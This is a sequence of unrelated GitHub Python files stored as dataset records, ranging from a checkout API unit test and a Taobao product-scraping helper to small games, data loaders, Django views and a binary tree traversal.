news_location))\n elif t_key.lower() == \"advert\":\n ns = mng.WriteAdvert()\n exp_date = t_json[t_key][\"exp_date\"]\n output_message = ns.prepareadvert(nm[0], exp_date.strip())\n ns.writeintofile(output_message, \"Advert\")\n mng.WriteToDB(\"advert\", ns.preparefordb(nm[0], exp_date.strip()))\n elif t_key.lower() == \"joke\":\n ns = mng.WriteJoke()\n output_message = ns.preparejoke(nm[0])\n ns.writeintofile(output_message, \"Joke\")\n mng.WriteToDB(\"joke\", ns.preparefordb(nm[0]))\n else:\n print(t_key + \" No chance to parse\")\n\ndef file_xml():\n path_to_file = input(\"Please enter the path to xml file (default): \")\n fs = mng.WriteFromFile()\n if path_to_file == \"\":\n path_to_file = default_xml_file\n root = fs.readingxml(path_to_file)\n else:\n root = fs.readingxml(path_to_file)\n for child in range(len(root)):\n if root[child].attrib[\"name\"].lower() == \"news\":\n ns = mng.WriteNews()\n news_location = root[child][0].text.strip()\n nm = pfn(root[child][1].text)\n output_message = ns.preparenews(nm[0], news_location)\n ns.writeintofile(output_message, \"News\")\n mng.WriteToDB(\"news\", ns.preparefordb(nm[0], news_location))\n elif root[child].attrib[\"name\"].lower() == \"advert\":\n ns = mng.WriteAdvert()\n exp_date = root[child][0].text.strip()\n nm = pfn(root[child][1].text)\n output_message = ns.prepareadvert(nm[0], exp_date.strip())\n ns.writeintofile(output_message, \"Advert\")\n mng.WriteToDB(\"advert\", ns.preparefordb(nm[0], exp_date.strip()))\n elif root[child].attrib[\"name\"].lower() == \"joke\":\n ns = mng.WriteJoke()\n nm = pfn(root[child][0].text)\n output_message = ns.preparejoke(nm[0])\n ns.writeintofile(output_message, \"Joke\")\n mng.WriteToDB(\"joke\", ns.preparefordb(nm[0]))\n else:\n print(t_key + \" No chance to parse\")\n\nif __name__ == \"__main__\":\n if args.manual == \"news\":\n print(f\"The type of news - {args.manual}\")\n manual_news(args.manual)\n elif args.manual == \"advert\":\n print(f\"The type of news - {args.manual}\")\n manual_advert(args.manual)\n elif args.manual == \"joke\":\n print(f\"The type of news - {args.manual}\")\n manual_joke(args.manual)\n\n if args.file == \"csv\":\n print(f\"News from - {args.file}\")\n file_csv()\n elif args.file == \"json\":\n print(f\"News from - {args.file}\")\n file_json()\n elif args.file == \"xml\":\n print(f\"News from - {args.file}\")\n file_xml()","repo_name":"OleksandrHorbunov/python_dqe","sub_path":"hwm10.py","file_name":"hwm10.py","file_ext":"py","file_size_in_byte":6277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33831703110","text":"'''\n@create : lisa\n@file :EBST\n@Date :2022/2/15\n@desc :\n\n'''\n\n# -*- coding:UTF-8 -*-\nimport unittest,json\nimport requests\nimport time,gc\nimport hashlib\nfrom urllib.parse import urlencode\nfrom public.get_token import Token\nfrom public.get_url import Url\nfrom public.get_headers import Headers\n\n#---------------EBST 结算页 ----------------------\nclass checkout_check_tax_id(unittest.TestCase):\n\n def setUp(self):\n\n # 文档检查是否需要税号(tax id):http://beta-store.elfbar.com/checkout/check-tax-id-need\n # 实际地址:https://beta-store.elfbar.com/coreapi//checkout/check-tax-id-need?country_id=3273&shipping_method_id=7\n # 目前有印度 + DHL / UPS / FEDEX ,美国 + UPS(id95)这几种组合条件需要做这个检查\n\n self.Url = Url().test_url()+\"/coreapi/checkout/check-tax-id-need\"\n print(self.Url)\n\n def testcase_001(self):\n #获取token\n token = Token().test_token ()\n #获取headers\n headers = Headers().test_get_headers_logined(token)\n Payload = {\"_gid\": \"GA1.2.474372163.1654678980\", \"_ga\": \"GA1.2.2049571130.1654678969\",\n \"_ga_8G02ZXM69R\": \"GS1.1.1654678969.1.1.1654680280.0\",\n \"currency_code\": \"USD\", \"PHPSESSID\": \"WBnWTaph261T76cUp8o1h7lajooyNHI8YF2FShos\", \"R-18\": \"ebst.com\",\n \"product-viewed\": \"5438\",\n \"_atuvc\": \"1%7C23\", \"_ga_HE9QE2KCYF\": \"GS1.1.1654763558.1.1.1654763639.0\", \"token\": token\n }\n param={\"country_id\":3273,\"shipping_method_id\":95}\n result = requests.get(self.Url, data=Payload, headers=headers,params=param)\n result=result.json()\n print ( result )\n self.assertEqual ( 0, result['code'] )\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"flying1209/EBST_interface_auto","sub_path":"testcase/CheckoutModule/checkout_check_tax_id.py","file_name":"checkout_check_tax_id.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4241003711","text":"from markdownify import markdownify\n\nfile = r\"/Users/oesterli/Desktop/project/test/objc_LG_GeolAssets_V1.html\"\n\nfile = open(file, \"r\").read()\nhtml = markdownify(file, heading_style=\"ATX\")\n\nmyMD = open(\"sample.md\",\"w\")\nmyMD.write(html)\nmyMD.close()\n\nprint(html)","repo_name":"oesterli/dmHelper","sub_path":"src/html2md.py","file_name":"html2md.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20995652729","text":"import scipy.signal as ss\nimport dotenv as de\nimport numpy as np\nimport time\nimport os\n\n\nde.load_dotenv()\n\nGRID_WIDTH = int(os.getenv('GRID_WIDTH'))\nGRID_HEIGHT = int(os.getenv('GRID_HEIGHT'))\nPERIOD = float(os.getenv('PERIOD'))\nBOUNDARY = os.getenv('BOUNDARY')\n\ndef show_grid(grid: np.ndarray):\n os.system('cls')\n print(grid)\n\nif __name__ == '__main__': \n\n #board initialization\n #Generates a grid of a specific width and height width all cells at 0 but those which position is readed from data file. \n with open(r'alives') as f:\n alives = np.array([r.split() for r in f.readlines()], dtype = np.int8)\n\n state = np.zeros((GRID_HEIGHT, GRID_WIDTH), dtype = np.int8)\n state[alives[:, 0], alives[:, 1]] = 1\n\n #Generates the kernel of the convolution\n kernel = np.ones((3, 3), dtype = np.int8); kernel[1, 1] = 0\n\n show_grid(state)\n time.sleep(2)\n\n #main loop\n while True:\n\n #Counts the number of neigboors of each cell \n count = ss.convolve2d(state, kernel, mode = 'same', boundary = BOUNDARY)\n\n # All Conway's game of life rules are checked with this logical line\n # 1. Any live cell with two or three live neighbors survives.\n # 2. Any dead cell with three live neighbors becomes a live cell.\n # 3. All other live cells die in the next generation due to underpopulation (fewe than two live neighbors)\n # or overcrowding (more tha three live neighbors)\n # 4. Dead cells with fewer than three live neighbors remain dead, and dead cells with more than three live neighbors stay dead \n #\n # Logical: A cell lives or survives if has 3 neighbors, also if is alive survives if it has 2 neighbors\n # (count == 3) or ((state == 1) and (count == 2))\n state = np.where(np.logical_or(count == 3, np.logical_and(state == 1, count == 2)), 1, 0)\n\n show_grid(state)\n time.sleep(PERIOD) # complete a loop\n\n\n ","repo_name":"Danixcviii/conway","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24646630921","text":"from tkinter import *\r\nimport random\r\nfrom tkinter import messagebox\r\n\r\n# initialize the game board\r\nboard = [\" \"]*9\r\n\r\n# initialize the game window\r\nroot = Tk()\r\nroot.title(\"Tic Tac Toe\")\r\n\r\n# initialize the game canvas\r\ncanvas = Canvas(root, width=300, height=300)\r\ncanvas.pack()\r\n\r\n# draw the game grid on the canvas\r\ncanvas.create_line(100, 0, 100, 300, width=2)\r\ncanvas.create_line(200, 0, 200, 300, width=2)\r\ncanvas.create_line(0, 100, 300, 100, width=2)\r\ncanvas.create_line(0, 200, 300, 200, width=2)\r\n\r\n# initialize the game status\r\ngame_over = False\r\nwinner = \"\"\r\n\r\n# function to check for a winner\r\n\r\n\r\ndef check_win(player):\r\n global game_over\r\n global winner\r\n if (board[0] == board[1] == board[2] != \" \" or\r\n board[3] == board[4] == board[5] != \" \" or\r\n board[6] == board[7] == board[8] != \" \" or\r\n board[0] == board[3] == board[6] != \" \" or\r\n board[1] == board[4] == board[7] != \" \" or\r\n board[2] == board[5] == board[8] != \" \" or\r\n board[0] == board[4] == board[8] != \" \" or\r\n board[2] == board[4] == board[6] != \" \"):\r\n game_over = True\r\n winner = player\r\n if winner == \"X\":\r\n messagebox.showinfo(\"Game Over\", \"You Win!\")\r\n elif winner == \"O\":\r\n messagebox.showinfo(\"Game Over\", \"You Lose!\")\r\n else:\r\n messagebox.showinfo(\"Game Over\", \"Tie Game!\")\r\n\r\n# function to make a move\r\n\r\n\r\ndef make_move(player, position):\r\n global board\r\n board[position] = player\r\n canvas.create_text((position % 3) * 100 + 50, (position // 3)\r\n * 100 + 50, text=player, font=(\"Arial\", 80), fill=\"red\")\r\n\r\n# function for the AI to make a move\r\n\r\n\r\ndef ai_move():\r\n global board\r\n open_spots = [i for i in range(9) if board[i] == \" \"]\r\n if open_spots:\r\n position = random.choice(open_spots)\r\n make_move(\"O\", position)\r\n check_win(\"O\")\r\n\r\n# function to restart the game\r\n\r\n\r\ndef restart_game():\r\n global board, game_over, winner\r\n board = [\" \"]*9\r\n canvas.delete(\"all\")\r\n # Recreate the game grid\r\n canvas.create_line(100, 0, 100, 300, width=2)\r\n canvas.create_line(200, 0, 200, 300, width=2)\r\n canvas.create_line(0, 100, 300, 100, width=2)\r\n canvas.create_line(0, 200, 300, 200, width=2)\r\n game_over = False\r\n winner = \"\"\r\n\r\n# event handler for mouse click\r\n\r\n\r\ndef click(event):\r\n global game_over\r\n if not game_over:\r\n x = event.x // 100\r\n y = event.y // 100\r\n position = y * 3 + x\r\n if board[position] == \" \":\r\n make_move(\"X\", position)\r\n check_win(\"X\")\r\n if not game_over:\r\n ai_move()\r\n\r\n\r\n# add the restart button\r\nbutton = Button(root)\r\nbutton = Button(root, text=\"Restart\", command=restart_game)\r\nbutton.pack()\r\ncanvas.bind(\"\", click)\r\nroot.mainloop()\r\n","repo_name":"MuhammadSaagit/tic-tac-toe","sub_path":"tic-tac-toe-ai.py","file_name":"tic-tac-toe-ai.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10672236880","text":"import os\nimport pandas as pd\nimport re\nimport unicodedata\nimport numpy as np\nimport pytups.tuplist as tl\nimport pytups.superdict as sd\nimport copy\nimport data.dates as aux\n\n\ndef make_name(name):\n # we take out spaces and later weird accents\n # we replace parenthesis with an underscore\n name = re.sub(pattern=r'\\(', string=name, repl='_')\n name = re.sub(\"\\s[a-z]\", lambda m: m.group(0)[1].upper(), name)\n name = re.sub(pattern=r'[\\s\\n\\):\\+\\?]', string=name, repl='')\n s2 = unicodedata.normalize('NFD', name).encode('ascii', 'ignore')\n return str(s2, 'utf-8')\n # return unidecode.unidecode(name)\n\n\ndef make_names(names):\n return [make_name(name) for name in names]\n\n\ndef generate_data_from_source(source=r'../data/raw/parametres_DGA_final.xlsm'):\n if not os.path.exists(source):\n print('Following path does not exist: {}'.format(source))\n return None\n excel_file = pd.ExcelFile(source)\n sheets = excel_file.sheet_names\n # print(sheets)\n excel_info = {make_name(sheet): excel_file.parse(sheet) for sheet in sheets}\n # print(excel_info.keys())\n\n for sheet in excel_info:\n excel_info[sheet].columns = make_names(excel_info[sheet].columns)\n\n return excel_info\n\n\ndef export_data_csv(excel_info, destination=\"../data/csv\"):\n for sheet in excel_info:\n excel_info[sheet].to_csv(destination + r'/{}.csv'.format(sheet), index=False)\n return\n\n\ndef generate_data_from_csv(directory=r'../data/csv/'):\n csvfiles = os.listdir(directory)\n csvfiles_dict = {path: os.path.splitext(path)[0] for path in csvfiles}\n return {csvfiles_dict[csv]: pd.read_csv(directory + csv) for csv in csvfiles}\n\n\ndef get_model_data(source=r'../data/raw/parametres_DGA_final.xlsm'):\n # we import the data set.\n table = generate_data_from_source(source=source)\n # print(table)\n\n params = table['Parametres']\n\n planning_cols = [col for col in params if re.findall(string=col, pattern=r'\\d+$') and\n int(re.findall(string=col, pattern=r'\\d+$')[0]) in range(2, 5)]\n\n horizon = params[planning_cols]\n horizon = horizon[~horizon.iloc[:, 1].isna()].rename(columns=lambda x: \"c\" + x[-1])\n horizon = horizon.assign(date=horizon.c4.apply(str) + \"-\" +\n horizon.c3.apply(lambda x: str(x).zfill(2)))\n horizon = horizon[~horizon.iloc[:, 0].isna()].set_index(\"c2\")[\"date\"].to_dict()\n\n params_gen = params[~params.Unnamed9.isna()].rename(\n columns={'Unnamed9': 'name', 'Unnamed10': 'value'})[['name', 'value']]\n\n params_gen = params_gen.set_index('name').to_dict()['value']\n\n # TASKS AND RESOURCES\n # if a task has 5 required capacities\n # and it has only 4 capacities in common with a resource\n # then the resource is not fitted to do the task\n # we assume all resources have the capacity=99\n # we use the resource type as a capacity to match them to tasks\n\n tasks_data = table['Missions']\n tasks_data = \\\n tasks_data.assign(start=tasks_data.AnneeDeDebut.apply(str) + '-' +\n tasks_data.MoisDeDebut.apply(lambda x: str(x).zfill(2)),\n end=tasks_data.AnneeDeFin.apply(str) + '-' +\n tasks_data.MoisDeFin.apply(lambda x: str(x).zfill(2)))\n\n tasks_data.set_index('IdMission', inplace=True)\n\n capacites_col = ['Type'] + [col for col in tasks_data if col.startswith(\"Capacite\")]\n capacites_mission = tasks_data.reset_index(). \\\n melt(id_vars=[\"IdMission\"], value_vars=capacites_col) \\\n [['IdMission', \"value\"]]\n capacites_mission = capacites_mission[~capacites_mission.value.isna()].set_index('value')\n\n avions = table['Avions_Capacite']\n\n capacites_col = ['TypeAvion', 'Capacites'] + [col for col in avions if col.startswith(\"Unnamed\")]\n capacites_avion = avions.melt(id_vars=[\"IdAvion\"], value_vars=capacites_col)[['IdAvion', \"value\"]]\n\n capacites_avion_extra = capacites_avion.IdAvion.drop_duplicates().to_frame().assign(value=99)\n capacites_avion = pd.concat([capacites_avion[~capacites_avion.value.isna()],\n capacites_avion_extra]).set_index('value')\n\n mission_capacities = tl.TupList(capacites_mission.to_records()).to_dict(result_col=0)\n aircraft_capacities = tl.TupList(capacites_avion.to_records()).to_dict(result_col=0)\n\n maint = table['DefinitionMaintenances']\n avions_state = table['Avions_Potentiels']\n\n model_data = {}\n model_data['parameters'] = {\n 'maint_weight': 1,\n 'unavail_weight': 1,\n 'max_used_time': maint.GainPotentielHoraire_heures.values.min().__float__()\n ,'max_elapsed_time': maint.GainPotentielCalendaire_mois.values.min().__int__()\n ,'maint_duration': maint.DureeMaintenance_mois.values.max().__int__()\n ,'maint_capacity': params_gen['Maintenance max par mois'].__int__()\n ,'start': horizon[\"Début\"]\n ,'end': horizon[\"Fin\"]\n }\n\n av_tasks = tasks_data.index\n # [task]\n model_data['tasks'] = {\n task: {\n 'start': tasks_data.start.to_dict()[task]\n , 'end': tasks_data.end.to_dict()[task]\n , 'consumption': tasks_data['MaxPu/avion/mois'].to_dict()[task]\n , 'num_resource': tasks_data.nombreRequisA1.to_dict()[task]\n , 'type_resource': tasks_data['Type'].to_dict()[task]\n , 'matricule': tasks_data['MatriculeMission'].to_dict()[task]\n , 'min_assign': tasks_data['MinAffectation'].to_dict()[task]\n , 'capacities': mission_capacities[task]\n } for task in av_tasks\n }\n\n av_resource = np.intersect1d(avions_state.IdAvion, avions.IdAvion)\n\n model_data['resources'] = {\n resource: {\n 'initial_used': avions_state.set_index(\"IdAvion\")['PotentielHoraire_HdV'].to_dict()[resource]\n , 'initial_elapsed': avions_state.set_index(\"IdAvion\")['PotentielCalendaire'].to_dict()[resource]\n , 'code': avions.set_index(\"IdAvion\")['MatriculeAvion'].to_dict()[resource]\n , 'capacities': aircraft_capacities[resource]\n } for resource in av_resource\n }\n\n return model_data\n\n\ndef generate_solution_from_source(source=r'../data/raw/Planifs M2000.xlsm'):\n excel_file = pd.ExcelFile(source)\n\n sheets = excel_file.sheet_names\n table = pd.read_excel(source, sheet_name='Visu totale', header=None)\n year = table.loc[0, 4:]\n year = np.where(np.char.startswith(np.array(year, dtype=\"U4\"), '20'),\n year,\n np.nan)\n year = pd.Series(year).fillna(method='ffill').apply(str)\n months_names = (\"Ja Fe Ma Av Mi Jn Jt Au Se Oc No De\").split(r' ')\n month_pos = {months_names[pos]: str(pos+1).zfill(2) for pos in range(len(months_names))}\n # lines = table.loc[1, 4:].isin(month_pos).reset_index(drop=True)\n months = table.loc[1, 4:].apply(lambda x: month_pos.get(x, \"00\")).reset_index(drop=True)\n colnames = ['code'] + list(year + '-' + months)\n table_n = table.loc[2:, 3:].copy()\n table_n.columns = colnames\n state = pd.melt(table_n, id_vars=\"code\", var_name=\"month\", value_name=\"state\").dropna()\n state = state[~state.month.str.endswith(\"00\")]\n return state.set_index([\"code\", \"month\"])['state'].to_dict()\n\n\ndef combine_data_states(model_data, historic_data):\n codes = sd.SuperDict.from_dict(model_data['resources']).get_property('code')\n codes_inv = {value: key for key, value in codes.items()}\n historic_data_n = {\n (codes_inv[code], month): value for (code, month), value in historic_data.items()\\\n if code in codes_inv\n }\n previous_states = {key: 'M' for key, value in historic_data_n.items()\n if int(str(value).startswith('V'))\n }\n model_data_n = copy.deepcopy(model_data)\n previous_states_sd = sd.SuperDict.from_dict(previous_states).to_dictdict()\n for key, value in previous_states_sd.items():\n model_data_n['resources'][key]['states'] = value\n return model_data_n\n\ndef get_model_data_all(options):\n model_data = get_model_data(options['PATHS']['input'])\n historic_data = generate_solution_from_source(options['PATHS']['hist'])\n model_data = combine_data_states(model_data, historic_data)\n model_data['parameters']['start'] = options['start']\n model_data['parameters']['end'] = \\\n aux.shift_month(model_data['parameters']['start'], options['num_period'] - 1)\n white_list = options.get('white_list', [])\n black_list = options.get('black_list', [])\n\n tasks = model_data['tasks']\n if len(black_list) > 0:\n tasks = {k: v for k, v in model_data['tasks'].items() if k not in black_list}\n if len(white_list) > 0:\n tasks = {k: v for k, v in model_data['tasks'].items() if k in white_list}\n model_data['tasks'] = tasks\n return model_data","repo_name":"pchtsp/optima","sub_path":"python/data/data_dga.py","file_name":"data_dga.py","file_ext":"py","file_size_in_byte":8826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35867764267","text":"\nimport pandas as pd\nimport json\nimport csv\n# db definitions\n\n# historical 2019-2020 season data\ndef read_19_20():\n stats_19_20 = pd.read_csv('./data/online_19_20_stats.csv')\n stats_19_20.drop('Rank', axis=1, inplace=True)\n stats_19_20['Taken'] = False\n return stats_19_20\n\n\n# projected data scraped from ESPN\ndef read_projected():\n stats_projected = pd.read_csv('./data/projected_player_data.csv')\n stats_projected['Taken'] = False\n return stats_projected\n\n\ndef read_database():\n stats_db = pd.read_csv('./database/projected_data.csv')\n return stats_db\n\n\ndef read_team():\n with open(\"./database/teams_data.json\") as f:\n team_data = json.loads(f.read())\n f.close()\n return team_data\n","repo_name":"trentliu92/fantasy-basketball-stat-analyzer","sub_path":"src/db_reader.py","file_name":"db_reader.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71207297388","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 17 11:52:27 2020\r\n\r\n@author: TVermeire\r\n\"\"\"\r\n\r\nimport os\r\nfrom os import listdir\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pylab as plt\r\n\r\n\r\n\r\n#%%\r\n\r\npath = 'C:/Users/tvermeire/Dropbox/Doctoraat/Applied Data Mining/XAI images/Spyder/misclassifications_experiment/blur replacement 2/'\r\nfolderList = listdir(path)\r\n\r\n#%%\r\n\r\ndata = pd.DataFrame()\r\nfor name in folderList: \r\n data = data.append(pd.read_excel(path + '/' + name + '/' + name + '.xlsx', index_col = 0, sheet_name='Sheet1'))\r\n\r\n#%%\r\n \r\nnp.sum(data['# images'])\r\nnp.sum(data['# misclassifications'])\r\n#%%\r\n\r\ndata_misclassified = pd.DataFrame()\r\nfor name in folderList: \r\n data_misclassified = data_misclassified.append(pd.read_excel(path + '/' + name + '/' + name + '.xlsx', index_col = 0, sheet_name='Sheet2'))\r\n \r\n#%%\r\nnp.sum(data_misclassified['# misclassified'])\r\n#%%\r\n\r\ndata_too_long = pd.DataFrame()\r\nfor name in folderList:\r\n data_too_long = data_too_long.append(pd.read_excel(path + '/' + name + '/' + name + '.xlsx', index_col = 0, sheet_name='Sheet3'))\r\n\r\n\r\n#%%\r\n \r\nnp.count_nonzero(data_too_long['target score change'] < data_too_long['original class score change'])\r\nnp.argwhere(data_too_long['target score change'] < data_too_long['original class score change'])\r\nnp.count_nonzero(data_too_long['target score change'] > 0)\r\nnp.count_nonzero(data_too_long['original class score change'] > 0)\r\n\r\n\r\nnp.corrcoef(data_too_long['target score change'], data_too_long['original class score change'])\r\n\r\nnp.count_nonzero(data_too_long['original class'] == data_too_long['current class'])\r\n","repo_name":"ADMAntwerp/ImageCounterfactualExplanations","sub_path":"isedc/misclassifications_experiment_evaluation.py","file_name":"misclassifications_experiment_evaluation.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36982153160","text":"import re\nfrom web_auto import WebAutoModule\nfrom lib import FunWrap, log, sleep\n\n\nclass XuanPin(WebAutoModule):\n def __init__(self) -> None:\n super().__init__()\n\n def pretreatment(self, task_name=\"\"):\n pass\n\n def get_number(self, temp_str):\n return int(\"\".join(list(filter(str.isdigit, temp_str))))\n\n @FunWrap(\"获取同款商品ID\", True)\n def get_same_item_id(self, same_item_url):\n # self.open_url(same_item_url, 3)\n elems = self.find_elems(\n '//div[@class=\"layui-tab-item t1 layui-show\"]//td[@class=\"lxSimilarSale\"]')\n if not elems:\n return\n # 通过天猫图片的父节点找到id\n # timao_list = self.find_elems(\n # '//*[@class=\"layui-tab-item t1 layui-show\"]//*[@class=\"lxSimilarShop\"]/img/parent::*/input',find_time=0.1)\n # 通过天猫图片后面的同级节点找到id\n timao_list = self.find_elems(\n '//div[@class=\"layui-tab-item t1 layui-show\"]//td[@class=\"lxSimilarShop\"]/img/following-sibling::input', find_time=0.1)\n timao_nid_list = []\n for e in timao_list:\n timao_nid_list.append(e.get_attribute(\"nid\"))\n # return\n\n def sort_a(e):\n return self.get_number(e.get_attribute(\"textContent\"))\n elems.sort(key=sort_a, reverse=True)\n nid_list = []\n for e in elems:\n if self.get_number(e.get_attribute(\"textContent\")) < 10:\n break\n parse_elem = self.driver.execute_script(\n \"return arguments[0].parentNode\", e)\n nid = parse_elem.get_attribute(\"nid\")\n if nid in timao_nid_list:\n continue\n nid_list.append(nid)\n print(nid_list)\n return nid_list\n\n @FunWrap(\"获取店铺链接\", True)\n def get_store_link(self):\n elem = self.find_elem(\n '//a[@data-spm=\"d21\"]')\n if not elem:\n return\n return elem.get_attribute(\"href\")\n\n @FunWrap(\"获取店铺宝贝数量\", True)\n def get_store_item_count(self,store_link):\n self.open_url(store_link + \"search.htm?orderType=hotsell_desc\")\n elem = self.find_elem(\n '//div[@class=\"search-result\"]/span')\n if not elem:\n print(\"失败\")\n return\n return int(elem.get_attribute(\"textContent\"))\n\n @FunWrap(\"获取宝贝上架时间\", True)\n def get_item_start_date(self,item_link):\n # self.open_url(item_link + \"search.htm?orderType=hotsell_desc\")\n elem = self.find_elem(\n '//span[@class=\"eachItem shangjiaTime second\"]/span')\n if not elem:\n print(\"失败\")\n return\n print(elem.get_attribute(\"textContent\"))\n return elem.get_attribute(\"textContent\")\n\n @FunWrap(\"获取店铺销量排行的宝贝\", True)\n def get_store_hottell_item(self):\n elems = self.find_elems(\n '//span[@class=\"sale-num\"]')\n if not elems:\n print(\"失败\")\n return\n hotsell_list = []\n for e in elems:\n hotsell_list.append(int(re.sub(r\"\\D\",\"\",e.get_attribute(\"textContent\"))))\n print(re.sub(r\"\\D\",\"\",e.get_attribute(\"textContent\")))\n return hotsell_list\n\n @FunWrap(\"获取店铺新品排行的宝贝\", True)\n def get_store_new_item(self):\n elems = self.find_elems(\n '//a[@class=\"item-name J_TGoldData\"]')\n if not elems:\n print(\"失败\")\n return False\n item_link_list = []\n for e in elems:\n item_link_list.append(e.get_attribute(\"href\"))\n return item_link_list\n\n\n def main(self):\n # self.get_same_item_id(\n # \"https://item.taobao.com/item.htm?spm=a230r.1.14.22.f1a81389bpUShl&id=641341517310\")\n # self.get_store_link()\n # self.get_store_item_count(\"https://shop277088919.taobao.com/\")\n # self.get_store_hottell_item()\n # self.get_store_new_item()\n self.get_item_start_date(\"\")\n\n\nif __name__ == \"__main__\":\n print(\"网页模块测试\")\n xp = XuanPin()\n xp.main()\n","repo_name":"178me/python_demo","sub_path":"选品/xuan_pin.py","file_name":"xuan_pin.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39668370960","text":"from django.shortcuts import render\nfrom django.shortcuts import get_object_or_404, get_list_or_404\nfrom django.http import HttpResponseRedirect\nfrom .models import Pais, Banda, Estilo\nfrom .forms import BandaForm, EstiloForm, PaisForm\nfrom django.utils.translation import gettext, activate, get_language\n\n#devuelve el listado de paises\ndef index_pais_banda(request):\n\ttrans = translate(language='eu')\n\tlistabandas = Banda.objects.raw('SELECT * FROM( SELECT * FROM appJukeBox_Banda ORDER BY nombre DESC) GROUP BY pais_id')\n\tcontext = {'lista_banda': listabandas}\n\treturn render(request, 'index.html', context)\n\ndef translate(language): \n\tcur_language = get_language()\n\ttry :\n\t\tactivate(language)\n\t\ttext = gettext('hello')\n\tfinally :\n\t\tactivate(cur_language)\n\treturn text\n\n#devuelve los detalles de un estilo\ndef show_estilo(request, estilo_id):\n\testilo = get_object_or_404(Estilo, pk=estilo_id)\n\tbandas = estilo.banda_set.all()\n\tcontext = {'bandas': bandas, 'estilo': estilo}\n\treturn render(request, \"estilo.html\", context)\n\n#devuelve las bandas de un pais\ndef index_bandas(request):\n\tbandas = get_list_or_404(Banda.objects.order_by('nombre'))\n\tcontext = {'bandas': bandas}\n\treturn render(request, 'bandas.html', context)\n\n#devuelve los detalles de una banda\ndef show_banda(request, banda_id):\n\tbanda = get_object_or_404(Banda, pk=banda_id)\n\testilos = banda.estilos.all()\n\tcontext = {'banda': banda, 'estilos': estilos}\n\treturn render(request, 'banda.html', context)\n\n#devuelve los datos de un pais\ndef show_pais(request, pais_id):\n\tpais = get_object_or_404(Pais, pk=pais_id)\n\tbandas = pais.banda_set.all()\n\tcontext = {'pais': pais, 'bandas': bandas}\n\treturn render(request, 'pais.html', context)\n\n#devuelve la lista de paises\ndef index_paises(request):\n\tpaises = get_list_or_404(Pais.objects.order_by('nombre'))\n\tcontext = {'paises': paises}\n\treturn render(request, 'paises.html', context)\n\n#devuelve las bandas de un pais\ndef index_estilos(request):\n\testilos = get_list_or_404(Estilo.objects.order_by('nombre'))\n\tcontext = {'estilos': estilos}\n\treturn render(request, 'estilos.html', context)\n\ndef upload_banda(request):\n\tsubmitted = False\n\tif request.method == \"POST\":\n\t\tform = BandaForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect(\"formulario_banda?submitted=True\")\n\t\n\telse:\n\t\tform = BandaForm()\n\t\tif \"submitted\" in request.GET:\n\t\t\tsubmitted = True\n\n\tcontext = {'form': form, 'submitted':submitted}\n\treturn render(request, 'formulario_banda.html', context)\n\ndef upload_estilo(request):\n\tsubmitted = False\n\tif request.method == \"POST\":\n\t\tform = EstiloForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect(\"formulario_estilo?submitted=True\")\n\t\n\telse:\n\t\tform = EstiloForm()\n\t\tif \"submitted\" in request.GET:\n\t\t\tsubmitted = True\n\n\tcontext = {'form': form, 'submitted':submitted}\n\treturn render(request, 'formulario_estilo.html', context)\n\ndef upload_pais(request):\n\tsubmitted = False\n\tif request.method == \"POST\":\n\t\tform = PaisForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect(\"formulario_pais?submitted=True\")\n\t\n\telse:\n\t\tform = PaisForm()\n\t\tif \"submitted\" in request.GET:\n\t\t\tsubmitted = True\n\n\tcontext = {'form': form, 'submitted':submitted}\n\treturn render(request, 'formulario_pais.html', context)","repo_name":"unaiLarra/jukeBox","sub_path":"appJukeBox/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18957237887","text":"class TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Tree(object):\n def __init__(self):\n self.root = None\n\n def add(self, item):\n node = TreeNode(item)\n if not self.root:\n self.root = node\n else:\n queue = [self.root]\n while True:\n pop_node = queue.pop(0)\n if not pop_node.left:\n pop_node.left = node\n return\n elif not pop_node.right:\n pop_node.right = node\n return\n else:\n queue.append(pop_node.left)\n queue.append(pop_node.right)\n\n\nclass Solution(object):\n\n def levelOrderBottom(self, root):\n if not root:\n return []\n result = [[root.val]]\n stack = [root]\n while len(stack) != 0:\n temp_stack = []\n for data in stack:\n if not data.left and not data.right:\n continue\n if data.left:\n temp_stack.append(data.left)\n if data.right:\n temp_stack.append(data.right)\n stack = temp_stack\n if len(stack)!=0:\n result.insert(0, [s.val for s in stack])\n return result\n\n\nif __name__ == '__main__':\n tree = Tree()\n for i in range(1, 11):\n tree.add(i)\n solution = Solution()\n result = solution.levelOrderBottom(tree.root)\n 